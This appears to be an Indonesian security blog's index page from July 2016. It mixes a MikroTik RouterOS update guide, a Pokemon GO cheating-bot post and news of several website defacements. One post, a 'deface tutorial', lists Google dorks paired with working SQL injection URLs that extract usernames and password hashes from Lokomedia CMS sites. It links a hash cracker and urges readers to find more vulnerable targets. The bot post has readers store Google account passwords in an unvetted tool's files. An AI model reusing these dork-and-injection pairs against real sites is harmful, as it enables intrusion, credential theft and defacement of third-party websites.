Rabu, 27 Juli 2016

Cara Update/Upgrade Mikrotik RouterOS via Winbox

Bagaimana cara upgrade/update RouterOS Mikrotik ke versi terbaru? Pertanyaan ini akan kita bahas pada artikel kali ini. Untuk melakukan upgrade versi RouterOS Mikrotik dapat dilakukan dengan beberapa cara, mulai dari cara manual hingga semi otomatis.

Cara Upgrade Mikrotik RouterOS secara manual sudah pernah saya bahas pada artikel berikut ini :
Untuk cara upgrade mikrotik secara semi otomatis, akan kita bahas pada artikel ini.

Namun sebelumnya, pastikan dulu Perangkat Mikrotik Anda sudah bisa konek ke Internet. Karena kita butuh akses internet untuk download Paket RouterOS terbaru langsung ke Mikrotik nya. Silakan baca artikel berikut :
Cara Mengkoneksikan Mikrotik ke Internet

Cara melakukan update/upgrade Mikrotik RouterOS secara semi otomatis sangatlah mudah. Hal ini bisa kita lakukan via Winbox Mikrotik dengan mengakses menu System --> Packages.

Cara Update/Upgrade Mikrotik RouterOS via Winbox

Akan muncul tampilan paket RouterOS yang digunakan beserta versi nya. Kemudian klik Check For Updates.

Cek pada kolom Installed Version dan Latest Version apakah ada perbedaan versi.

Cara Update/Upgrade Mikrotik RouterOS via Winbox

Jika ada silakan klik Download & Install.

Cara Update/Upgrade Mikrotik RouterOS via Winbox

Tunggu hingga proses download selesai. Selanjutnya Mikrotik akan melakukan upgrade secara otomatis dan reboot otomatis. Setelah reboot, pastikan paket upgrade nya sudah terinstall semua.

Cara Update/Upgrade Mikrotik RouterOS via Winbox

Oke, demikianlah Cara Update/Upgrade Mikrotik RouterOS Semi Otomatis via Winbox. Silakan dicoba dan semoga bermanfaat :)

Read more

AUTO BOT POKEMON GO FARMING LEVEL UP POKEMON GO 2016 WORK 1000% POKECROT V1.2 DOWNLOAD!!

DOWNLOAD Bot : < BOT >
Download nox app : < nox app >
Download Pokemon APK : < Pokemon APK >

Tutorial :

Extrack File Ke Desktop
Setting ID & Password Kalian Di (accountsGoogle.txt/accountsPtc.txt)
Setting Account Google / PTC di setting.ini ( True = Yes / False = No )
Setting Cordinate , Auto Transfer & Auto recycle Di setting.ini ( True = Yes / False = No )
Setting Filter Recycle Item di itemRecycleFilter.ini
Jika Sudah Silahkan Buka Pokecrot untuk start farming

Lokasi Hunting Pokemon :

- "Monas, Jakarta, Indonesia", lat = -6.175299, lng = 106.827107
- "ITB, Bandung, Indonesia", lat = -6.89148, lng = 107.610659
- "London, England", lat = 51.501663, lng = -0.14102
- "Santa Monica Pier, LA, USA", lat = 34.00873594425199, lng = -118.49761247634888
- "Bryant Park, NY, USA", lat = 40.75320648472645, lng = -73.98390769958496
- "Sydney, Australia", lat = -33.870273020353416, lng = 151.20878219604492
- "Lillydale Lake, Australia", lat = -37.765249, lng = 145.3524663
- "Tokyo, Japan", lat = 35.69051125265253, lng = 139.68954205513

How To find more location : ( OPTIONAL )

1. kamu harus pilih dimana lokasi yang kamu inginkan visit to http://www.latlong.net/
2. klo sudah kamu temukan koordinatnya 
3. Kopikan koor ke akun google / ptc kmu 
4.Check Setting kamu lalu ubah juga koordinat yang sama dgn google kamu sesuaikan dgn posisi yang kamu inginkan


How To Use Pokemon GO Bot (Auto Farmer, Egg Hatcher, Duplicate Transfer + More!)

Tutorial Leveling Pokemon GO Bot, Auto Catch, Auto Pokestop, Auto Level UP, Auto Transfer

JANGAN KAWATIR: 

- Jika Muncul permintaan Device : Itu awal dari permintaan Izin saja , Jika pertama kali menggunakan Bot nanti ada permintaan itu , kamu cek di tampilan Bot mu ada kode masukan aja ke permintaa verifikasi google nya bro lalu vertifikasi !! Selamat MENCOBA !!
- Dan Jika Kamu miss mencari pokemon / gak dapat exp , tutup pokecrot selama 1 JAM lalu buka Pokecrot kembali , Taraaaaattt Sukses deh !!



Video Dibawah ini :)









Read more

Tutorial Deface Menggunakan Sql Lokomedia

Dork : inurl:kategori-23-hiburan.html Exploit : /kategori--23'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---hiburan.html
DORK : inurl:kategori-41-metropolitan.html
EXPLOIT : /kategori--41'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---metropolitan.html
DORK : inurl:kategori-21-ekonomi.html
EXPLOIT : /kategori--21'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---ekonomi.html
DORK : inurl:kategori-39-internasional.html
EXPLOIT : /kategori--39'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---internasional.html
DORK : inurl:kategori-2-olahraga.html
EXPLOIT : /kategori--2'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---olahraga.html
SQL LOKOMEDIA :)
gak vuln ? cari target yang lain :*edit sendiri lagi dorknya / kembangin 
Hashnya di sini > https://hashkiller.co.uk/md5-decrypter.aspx















Cek Video Di Bawah ini 



Read more

Senin, 25 Juli 2016

Tiga Subdomain Situs Universitas Gadjah Mada Diretas Sanjungan Jiwa Team

Pagi ini kembali linuxsec mengabarkan kasus peretasan situs dalam negeri. Tepatnya situs akademik. Korbannya kali ini adalah subdomain dari ugm.ac.id . Tiga subdomain tersebut diretas oleh defacer dari Tim Sanjungan Jiwa Team. Mereka mengubah background website dengan warna hitam dan gambar Gasai Yuno, dari anime Mirai Nikki.

Di ketiga subdomain tersebut juga terdapat pesan berikut :
UGM Pwn by Ice-cream
Greetz :
je Incovers - Strlen - ReC0ded - Pak Haxor - Isal Dot ID - ViruzTomcat - Topi Jerami - Wonka - AdrElite - Mr Error404 - Panataran - ./L1ght_R00t - eX-Sh1Ne - Podol - Eitaro Attacker - CaptSalkus48 - AnoaGhost - $n00.py - Virulent-ID - Sh0uT0u7 - Saviour Attacker - Wolfon - Rebels - MR.INTERCEPTION
Kindly Fix The Bug Immediately

Kami juga sempat mewawancarai pelaku dan mengkonfirmasi kalau aksi peretasan ini hanya untuk test keamanan saja. Diharapkan nantinya pihak UGMsendiri akan lebih memperhatikan security webnya.
Berikut list website yang diretas tersebut :
http://icitee.ugm.ac.id/
http://kmhe2016.ugm.ac.id/
http://cycling.ugm.ac.id/

Sampai berita ini diturunkan belum ada perbaikan dari website yang bersangkutan.
Namun kalian bisa juga melihat mirror nya disini :
http://zone-h.org/mirror/id/26581235
http://zone-h.org/mirror/id/26581236
http://zone-h.org/mirror/id/26581234

Oke sekian berita pagi hari ini, selamat beraktifitas. (jack/lsc)
Read more

Minggu, 24 Juli 2016

Perang Defacer di Situs Mirror Deface Indonesia DefacerID

Kali ini mungkin saya tidak akan melaporkan kasus peretasan situs dalam negeri namun akan mengulas kejadian "unik" di situs mirroring defacer.id . Yup ada beberapa mirror deface yang saling menghina tim maupun nick lain.

Ada salahsaitu tim bernama " #OPMedanCyberTeam " disana yang cukup menarik perhatian saya . Disana disebut bahwa mereka membenci Medan Cyber Team karena dianggap terlalu berlebihan melakukan mass fake deface di situs tersebut demi mendapatkan ranking tinggi di Defacer.ID . Caranya adalah dengan membuat unlimited subdomain di cpanel dan melakukan mass submit ke defacer.id .
Saya sendiri kurang tau siapa sebenarnya yang mengawali fake deface tersebut namun ketika saya lihat di mirror salahsatu anggota Medan Cyber Team , memang ada indikasi bahwa mereka melakukan fake deface.
Pelaku yang menggunakan tim " #OpMedanCyberTeam " sendiri tidak saya ketahui. Namun yang jelas nick nick yang menjadi anggotanya adalah ulah pelaku, alias pelaku mensubmit mirrornya mengatasnamakan Tu5b0l3d, XnonGermx, Kuzura, dll.
Belum kelar masalahnya, malah ada tim baru yang sepertinya juga dilakukan oleh orang yang sama.
Namanya " #FuckKidSZonk " .
Isi mirrornya sama , tantangan terhadap si KidSZonk.

KidSZonk sendiri adalah salahsatu defacer yang pernah meretas domain utama Kampus IPB.
Baca :

Yah semoga konflik seperti ini segera berakhir. Dan juga semoga kedepannya DefacerID lebih profesional, menolak fake mirror sehingga bisa seperti Zone-H. (jack/lsc)
Read more

Sabtu, 23 Juli 2016

Zone-H Diretas, Pelaku Palsukan Mirror Deface Google, FBI, dan CIA

Ada ada saja yang dilakukan oleh hacker ini. Setelah meretas situs mirroring Zone-.org, mereka memalsukan mirror deface Google, FBI, dan juga CIA.

Awalnya saay sata melihat mirror deface dari FBI, CIA, dan Google saya anggap itu benar benar terjadi. Namun saya jadi penasaran kok beritanya tidak ada di situs luar bahkan The Hacker News pun tidak memberitakannya. Maka saya mulai berasumsi bahwa situs zone-h.org lah yang bermasalah.
Kemudian saya mencoba membuka source salah satu web high profile yang diretas :
FBI.gov Hacked :
http://www.zone-h.org/mirror/id/26575976
Nah ketika di view source, iframe nya berasal dari mirror lain :
zonehmirrors.org/defaced/2016/07/23/templedataghana.com/templedataghana.com/ok.html

Begitu juga dengan mirror Google.com:
http://zone-h.org/mirror/id/26575951
serta CIA.gov :
http://zone-h.org/mirror/id/26576014
Dan benar saja saat saya mencoba membuka homepage Zone-H memang benar diretas !
Berikut pesan yang ditinggalkan :
zone-h Pwned !

Own3d by Moroccanwolf & Kuroi'SH
We rock ;)
Last Deface
Greetz To : Abdellah Elmaghribi - Kuroi'SH - RxR - Gang Dz - V0TR3X
Setelah itu saya mulai yakin kalau mereka sengaja memanipulasi database Zone-H dengan memasukkan mirror fake dari tiga web diatas.
Sampai berita ini diturunkan belum ada perbaikan dari situs Zone-H.org sehingga keberadaan mirror palsu dari web high profile tersebut masih ada. kemungkinan mirror ketiganya akan dihapus ketika web zone-h sudah pulih kembali.
Oke sekian berita pagi hari ini selamat beraktifitas. (jack/lsc)
Read more

Kamis, 21 Juli 2016

Situs Pengadilan Negeri Sukoharjo Diretas Hacker Tunisia

Selamat pagi kali ini linuxsec kembali mengabarkan kasus peretasan situs pemerintahan Indonesia. Situs PN Sukoharjo baru baru ini diretas oleh hacker yang berasal dari Tunisia. Defacer nya sendiri memang tidak merusak halaman depan situs.

Defacer dengan kodenama HUNT3RXM tersebut hanya menitipkan file " xm.php " dengan pesan berikut :
[#] HACKED BY HUNT3RXM [#]
[!] Your Security Get Down ?? [!]
[!] Hacking is an Art !! [!
./TUNISIA
Selain itu dilampirkan pula gambar gif dari tokoh Chelsea dari anime Akame ga Kill!
Sepertinya defacer tersebut memang orang yang hobi meretas situs pemerintahan dari berbagai negara. Karena saya cek arsip mirrornya memang kebanyakan situs gov.
Sampai berita ini diturunkan file yang dibuat oleh defacer di situs pn-sukoharjo.go.id tersebut masih ada.
Mirror nya bisa kalian lihat disini :

Oke mungkin sekian dulu berita pagi hari ini, selamat beraktivitas. (jack/lsc)
Read more

Rabu, 20 Juli 2016

Gantengers Crew Beraksi, Situs Telkomsel Loop Kebobolan

Bagi kalian yang mengikuti perkembangan underground Indonesia tentu tidak asing dengan tim Gantengers Crew. Tim yang terkenal membernya seperti Sultan Haikal yang sering menargetkan website website government dan perusahaan besar, atau D3b~X dan Index Php yang terkenal sebagai Mass Defacer nya Indonesia. Setelah lama tidak ada kabar, kali ini mereka kembali unjuk gigi. Situs Loop Telkomsel diretas.
Mereka memang tidak merusak halaman depan dari situs yang beralamat di loop.co.id tersebut. Namun sepertinya bukan karena tidak bisa, namun lebih karena tidak ingin menganggu kinerja situs tersebut. Hal ini dibuktikan dengan keberasilan mereka mengupload file "lol.txt" di root path loop.co.id sebagai bukti kalau mereka memiliki akses ke situs tersebut.
Beriku screenshot nya :
Tidak ada pesan khusus yang dibuat oleh pelaku, hanya tulisan "Owned".
Lalu darimana saya tau kalau ini ulah dari Gantengers Crew ?
Kebetulan saat sore ini saya on di Facebook salahsatu member tim tersebut "show off" di beranda saya dan saat saya cek memang file yang mereka upload tersebut masih ada. Namun tentu saja saya tidak akan menyebarkan identitas pelaku karena itu privasi.
Namun bukti yang tidak bisa dibantah adalah mirror zone-h yang dinotif oleh GantengersCrew. Bukti kalau ini memang "ulah" mereka.

Nah sampai berita ini diturunkan belum ada perbaikan dari situs yang bersangkutan, yah semoga saja segera diperbaiki dan keamanannya ditingkatkan.
Read more